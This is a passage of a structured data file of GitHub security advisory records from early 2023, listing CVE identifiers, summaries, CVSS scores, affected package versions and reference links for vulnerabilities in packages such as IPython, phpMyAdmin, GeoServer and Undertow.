'nvd_published_at': '2023-02-23T15:15:00Z'}" 1.4.0,GHSA-vrh7-x64v-7vxq,2023-02-21T19:48:07Z,2023-02-08T22:21:22Z,,['CVE-2023-0401'],openssl-src contains `NULL` dereference during PKCS7 data verification,"A `NULL` pointer can be dereferenced when signatures are being verified on PKCS7 `signed` or `signedAndEnveloped` data. In case the hash algorithm used for the signature is known to the OpenSSL library but the implementation of the hash algorithm is not available the digest initialization will fail. There is a missing check for the return value from the initialization function which later leads to invalid usage of the digest API most likely leading to a crash. The unavailability of an algorithm can be caused by using FIPS enabled configuration of providers or more commonly by not loading the legacy provider. PKCS7 data is processed by the SMIME library calls and also by the time stamp (TS) library calls. The TLS implementation in OpenSSL does not call these functions however third party applications would be affected if they call these functions to verify signatures on untrusted data.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '300.0.0'}, {'fixed': '300.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0401'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=d3b6dfd70db844c4499bec6ad6601623a565e674'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/openssl-src-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0013.html'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230207.txt'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:21:22Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-pfcc-3g6r-8rg8,2023-03-03T23:12:22Z,2023-02-23T21:30:16Z,,['CVE-2022-4492'],Undertow client not checking server identity presented by server certificate in https connections,The undertow client is not checking the server identity presented by the server certificate in https connections. This should be performed by default in https and in http/2.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.5.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.24.Final'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4492'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/pull/1447'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/pull/1447/commits/e5071e52b72529a14d3ec436ae7102cea5d918c4'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/pull/1457'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/pull/1457/commits/a4d3b167126a803cc4f7fb740dd9a6ecabf59342'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2022-4492'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2153260'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/blob/master/core/src/main/java/io/undertow/security/impl/ClientCertAuthenticationMechanism.java'}, {'type': 'WEB', 'url': 'https://issues.redhat.com/browse/MTA-93'}, {'type': 'WEB', 'url': 'https://issues.redhat.com/browse/UNDERTOW-2212'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230324-0002/'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T23:12:22Z', 'nvd_published_at': '2023-02-23T20:15:00Z'}" 1.4.0,GHSA-wqxw-8h5g-hq56,2023-02-15T17:35:36Z,2023-02-02T01:33:06Z,,['CVE-2023-23925'],Switcher Client contains Regular Expression Denial of Service (ReDoS),"### Impact Unsanitized input flows into Strategy match operation (EXIST), where it is used to build a regular expression. This may result in a Regular expression Denial of Service attack (reDOS). ### Patches Patched in 3.1.4 ### Workarounds Avoid using Strategy settings that use REGEX in conjunction with EXIST and NOT_EXIST operations.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'switcher-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/switcherapi/switcher-client-master/security/advisories/GHSA-wqxw-8h5g-hq56'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23925'}, {'type': 'WEB', 'url': 'https://github.com/switcherapi/switcher-client-master/commit/374752563d6ce9353ee592b40c809c8136f24930'}, {'type': 'PACKAGE', 'url': 'https://github.com/switcherapi/switcher-client-master'}, {'type': 'WEB', 'url': 'https://github.com/switcherapi/switcher-client-master/releases/tag/v3.1.4'}]","{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T01:33:06Z', 'nvd_published_at': '2023-02-03T20:15:00Z'}" 1.4.0,GHSA-3x2c-87cq-qx49,2023-02-15T22:00:33Z,2023-02-08T00:30:33Z,,['CVE-2023-0736'],Cross-site Scripting (XSS) in wallabag/wallabag ,Cross-site Scripting (XSS) - Stored in GitHub repository wallabag/wallabag prior to 2.5.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0736'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/4e023bddc3622ba5e901cc14a261fcb98d955cd7'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7e6f9614-6a96-4295-83f0-06a240be844e'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T18:13:44Z', 'nvd_published_at': '2023-02-07T23:15:00Z'}" 1.4.0,GHSA-65px-4cpf-697r,2023-02-15T22:00:10Z,2023-02-08T09:30:24Z,,['CVE-2023-0740'],Cross-site scripting vulnerability found in answerdev/answer,Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0740'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/c3001de52af91f09c96e701facbce0b9fa0c98ad'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/802ee76d-fe01-482b-a9a4-34699a7c9110'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T18:17:25Z', 'nvd_published_at': '2023-02-08T08:15:00Z'}" 1.4.0,GHSA-29gw-9793-fvw7,2023-02-10T22:08:04Z,2023-02-10T19:55:53Z,,['CVE-2023-24816'],IPython vulnerable to command injection via set_term_title,"IPython provides an interactive Python shell and Jupyter kernel to use Python interactively. Versions prior to 8.10.0 are vulnerable to command injection in the `set_term_title` [function](https://github.com/ipython/ipython/blob/3f0bf05f072a91b2a3042d23ce250e5e906183fd/IPython/utils/terminal.py#L103-L117) under specific conditions. This has been patched in version 8.10.0. ### Impact Users are only vulnerable when calling this function in Windows in a Python environment where [ctypes](https://docs.python.org/3/library/ctypes.html) is not available. The dependency on ctypes in `IPython.utils._process_win32` prevents the vulnerable code from ever being reached (making it effectively dead code). However, as a library that could be used by another tool, `set_term_title` could introduce a vulnerability for dependencies. Currently `set_term_title` is only called with (semi-)trusted input that contain the current working directory of the current IPython session. If an attacker can control directory names, and manage to get a user to `cd` into this directory, then the attacker can execute arbitrary commands contained in the folder names.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'IPython'}, 'ecosystem_specific': {'affected_functions': ['IPython.utils.terminal.set_term_title']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ipython/ipython/security/advisories/GHSA-29gw-9793-fvw7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24816'}, {'type': 'WEB', 'url': 'https://github.com/ipython/ipython/commit/385d69325319a5972ee9b5983638e3617f21cb1f'}, {'type': 'WEB', 'url': 'https://github.com/ipython/ipython/commit/991849c247fc208628879e7ca2923b3c218a5a75'}, {'type': 'WEB', 'url': 'https://github.com/Carreau/ipython/blob/7557ade0ed927475d5ab5b573d0ea4febfb22683/docs/source/whatsnew/version8.rst#ipython-810'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipython/ipython'}, {'type': 'WEB', 'url': 'https://github.com/ipython/ipython/blob/3f0bf05f072a91b2a3042d23ce250e5e906183fd/IPython/utils/terminal.py#L103-L117'}, {'type': 'WEB', 'url': 'https://github.com/ipython/ipython/blob/56e6925dfa50e2c7f4a6471547b8176275db7c25/IPython/utils/_process_win32.py#L20'}]","{'cwe_ids': ['CWE-20', 'CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T19:55:53Z', 'nvd_published_at': '2023-02-10T20:15:00Z'}" 1.4.0,GHSA-3p9x-xxx6-2w4p,2023-02-08T00:23:30Z,2023-02-02T03:30:23Z,,['CVE-2023-25014'],"Broken Access Control in 3rd party TYPO3 extension ""femanager""",A missing access check in the `InvitationController` allows an unauthenticated user to delete all frontend users.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.3.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25014'}, {'type': 'PACKAGE', 'url': 'https://github.com/in2code-de/femanager'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2023-001'}]","{'cwe_ids': ['CWE-306'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T00:23:30Z', 'nvd_published_at': '2023-02-02T01:15:00Z'}" 1.4.0,GHSA-65rp-mhqf-8gj3,2023-03-03T00:12:19Z,2023-02-24T06:30:16Z,,['CVE-2023-26102'],rangy vulnerable to Prototype Pollution,All versions of the package rangy are vulnerable to Prototype Pollution when using the `extend()` function in file `rangy-core.js`.The function uses recursive merge which can lead an attacker to modify properties of the Object.prototype.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rangy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26102'}, {'type': 'WEB', 'url': 'https://github.com/timdown/rangy/issues/478'}, {'type': 'PACKAGE', 'url': 'https://github.com/timdown/rangy'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-RANGY-3175702'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:23:36Z', 'nvd_published_at': '2023-02-24T05:15:00Z'}" 1.4.0,GHSA-c38p-vw6j-qjpr,2023-02-23T22:08:41Z,2023-02-12T15:30:25Z,,['CVE-2023-0791'],Cross-site Scripting in thorsten/phpmyfaq,Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0791'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/26663efcb0b67e421e4ecccad8f19e7106bb03ce'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7152b340-c6f3-4ac8-9f62-f764a267488d'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:56:51Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-j75r-vf64-6rrh,2023-03-07T04:03:37Z,2023-02-24T18:30:25Z,,['CVE-2023-0481'],RestEasy Reactive implementation of Quarkus allows Creation of Temporary File With Insecure Permissions,In RestEasy Reactive implementation of Quarkus the insecure `File.createTempFile()` is used in the `FileBodyHandler` class which creates temp files with insecure permissions that could be read by a local user.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.quarkus.resteasy.reactive:resteasy-reactive-common-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0.Alpha4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0481'}, {'type': 'WEB', 'url': 'https://github.com/quarkusio/quarkus/pull/30694'}, {'type': 'WEB', 'url': 'https://github.com/quarkusio/quarkus/commit/95d5904f7cf18c8165b97d8ca03b203d7f69c17e'}, {'type': 'PACKAGE', 'url': 'https://github.com/quarkusio/quarkus'}]","{'cwe_ids': ['CWE-378', 'CWE-668'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T19:55:15Z', 'nvd_published_at': '2023-02-24T18:15:00Z'}" 1.4.0,GHSA-4cwh-8w4g-jxxh,2023-02-21T19:00:20Z,2023-02-08T09:30:24Z,,['CVE-2023-0744'],Answer contains Improper Access Control vulnerability,Improper Access Control in GitHub repository answerdev/answer prior to 1.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0744'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/c1fa2b13f6b547b96da60b23350bbe2b29de542d'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/35a0e12f-1d54-4fc0-8779-6a4949b7c434'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/171733/Answerdev-1.0.3-Account-Takeover.html'}]","{'cwe_ids': ['CWE-284'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:34:33Z', 'nvd_published_at': '2023-02-08T08:15:00Z'}" 1.4.0,GHSA-6hr3-44gx-g6wh,2023-02-23T21:32:13Z,2023-02-13T06:30:59Z,,['CVE-2023-25727'],XSS vulnerability in drag-and-drop upload of phpMyAdmin,"In phpMyAdmin before 4.9.11 and 5.x before 5.2.1, an authenticated user can trigger XSS by uploading a crafted .sql file through the drag-and-drop interface. By disabling the configuration directive `$cfg['enable_drag_drop_import']`, users will be unable to use the drag and drop upload which would protect against the vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpmyadmin/phpmyadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.9.11'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'phpmyadmin/phpmyadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '5.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25727'}, {'type': 'PACKAGE', 'url': 'https://github.com/phpmyadmin/composer'}, {'type': 'WEB', 'url': 'https://www.phpmyadmin.net/security/PMASA-2023-1/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:43:33Z', 'nvd_published_at': '2023-02-13T06:15:00Z'}" 1.4.0,GHSA-fhj6-gr87-g4cj,2023-02-22T18:35:42Z,2023-02-14T03:30:20Z,,['CVE-2023-24187'],XML External Entity Reference in ureport,An XML External Entity (XXE) vulnerability in ureport v2.2.9 allows attackers to execute arbitrary code via uploading a crafted XML file to /ureport/designer/saveReportFile.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.bstek.ureport:ureport2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24187'}, {'type': 'WEB', 'url': 'https://github.com/Venus-WQLab/bug_report/blob/main/ureport/ureport-cve-2023-24187.md'}, {'type': 'WEB', 'url': 'https://github.com/cgddgc/vulns/blob/main/ureport2-vuln-des.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/youseries/ureport'}, {'type': 'WEB', 'url': 'http://ureport.com'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:56:11Z', 'nvd_published_at': '2023-02-14T02:15:00Z'}" 1.4.0,GHSA-7g5f-wrx8-5ccf,2023-02-22T19:15:56Z,2023-02-22T19:15:56Z,,['CVE-2023-25157'],GeoServer OGC Filter SQL Injection Vulnerabilities,"### Impact GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. SQL Injection Vulnerabilities have been found with: * ``PropertyIsLike`` filter, when used with a String field and any database DataStore, or with a PostGIS DataStore with encode functions enabled * ``strEndsWith`` function, when used with a PostGIS DataStore with encode functions enabled * ``strStartsWith`` function, when used with a PostGIS DataStore with encode functions enabled * ``FeatureId`` filter, when used with any database table having a String primary key column and when prepared statements are disabled * ``jsonArrayContains`` function, when used with a String or JSON field and with a PostGIS or Oracle DataStore (GeoServer 2.22.0+ only) * ``DWithin`` filter, when used with an Oracle DataStore ### Patches * GeoSever 2.21.4 * GeoServer 2.22.2 * GeoServer 2.20.7 * GeoServer 2.19.7 * GeoServer 2.18.7 ### Workarounds 1. Disabling the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` vulnerabilities (Like filters have no mitigation, if there is a string field in the feature type published). 2. Enabling the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` vulnerability. ### References * [OGC Filter SQL Injection Vulnerabilities](https://github.com/geotools/geotools/security/advisories/GHSA-99c3-qc2q-p94m) (GeoTools) * [OGC Filter Injection Vulnerability Statement](https://geoserver.org/vulnerability/2023/02/20/ogc-filter-injection.html) (GeoServer Blog)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.geoserver.community:gs-jdbcconfig'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.21.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geoserver.community:gs-jdbcconfig'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.22.0'}, {'fixed': '2.22.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25157'}, {'type': 'WEB', 'url': 'https://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d'}, {'type': 'PACKAGE', 'url': 'https://github.com/geoserver/geoserver'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:15:56Z', 'nvd_published_at': '2023-02-21T22:15:00Z'}" 1.4.0,GHSA-68wj-c2jw-5pp9,2023-06-12T23:33:02Z,2023-02-18T00:31:59Z,,['CVE-2023-24769'],Stored cross site scripting in changedetection.io,"Changedetection.io before 0.40.2 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the main page. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL parameter under the ""Add a new change detection watch"" function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'changedetection.io'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.40.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24769'}, {'type': 'WEB', 'url': 'https://github.com/dgtlmoon/changedetection.io/issues/1358'}, {'type': 'WEB', 'url': 'https://github.com/dgtlmoon/changedetection.io/pull/1359'}, {'type': 'PACKAGE', 'url': 'https://github.com/dgtlmoon/changedetection.io'}, {'type': 'WEB', 'url': 'https://www.edoardoottavianelli.it/CVE-2023-24769'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T23:33:02Z', 'nvd_published_at': '2023-02-17T22:15:00Z'}" 1.4.0,GHSA-pv4m-h859-jwmq,2023-02-14T21:22:07Z,2023-02-04T09:30:20Z,,['CVE-2023-0674'],Cross-Site Request Forgery in XXL Job,"A vulnerability, which was classified as problematic, has been found in XXL-JOB 2.3.1. Affected by this issue is some unknown functionality of the file /user/updatePwd of the component New Password Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220196.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.xuxueli:xxl-job'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0674'}, {'type': 'WEB', 'url': 'https://github.com/boyi0508/xxl-job-explain/blob/main/README.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/xuxueli/xxl-job'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220196'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220196'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:22:07Z', 'nvd_published_at': '2023-02-04T08:15:00Z'}" 1.4.0,GHSA-mm8v-wmqx-8h2j,2023-02-08T00:23:23Z,2023-02-02T03:30:23Z,,['CVE-2023-25013'],"Broken Access Control in 3rd party TYPO3 extension ""femanager""",A missing access check in the `InvitationController` allows an unauthenticated user with a valid invitation link to set the password of all frontend users.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.3.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'in2code/femanager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25013'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/in2code/femanager/CVE-2023-25013.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/in2code-de/femanager'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2023-001'}]","{'cwe_ids': ['CWE-306'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T00:23:23Z', 'nvd_published_at': '2023-02-02T01:15:00Z'}" 1.4.0,GHSA-r2vq-p658-p274,2023-02-23T22:07:55Z,2023-02-13T21:31:03Z,,['CVE-2023-25240'],SameSite Attribute vulnerability in pimCore,An improper SameSite Attribute vulnerability in pimCore v10.5.15 allows attackers to execute arbitrary code.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25240'}, {'type': 'WEB', 'url': 'https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-10.5.15'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:29:53Z', 'nvd_published_at': '2023-02-13T21:15:00Z'}" 1.4.0,GHSA-9j2p-8qqf-h55c,2023-02-23T22:11:03Z,2023-02-13T21:31:03Z,,['CVE-2022-4905'],Cross-site Scripting in UDX Stateless Media Plugin,A vulnerability was found in UDX Stateless Media Plugin 3.1.1. It has been declared as problematic. This vulnerability affects the function setup_wizard_interface of the file lib/classes/class-settings.php. The manipulation of the argument settings leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 3.2.0 is able to address this issue. The name of the patch is 6aee7ae0b0beeb2232ce6e1c82aa7e2041ae151a. It is recommended to upgrade the affected component. VDB-220750 is the identifier assigned to this vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wpcloud/wp-stateless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4905'}, {'type': 'WEB', 'url': 'https://github.com/udx/wp-stateless/pull/630'}, {'type': 'WEB', 'url': 'https://github.com/udx/wp-stateless/commit/6aee7ae0b0beeb2232ce6e1c82aa7e2041ae151a'}, {'type': 'WEB', 'url': 'https://github.com/udx/wp-stateless/releases/tag/3.2.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220750'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220750'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T22:11:03Z', 'nvd_published_at': '2023-02-13T21:15:00Z'}" 1.4.0,GHSA-rghh-ghf7-7943,2023-02-13T16:48:42Z,2023-02-04T21:30:22Z,,['CVE-2023-22849'],Sling App CMS Cross-site Scripting vulnerability,An 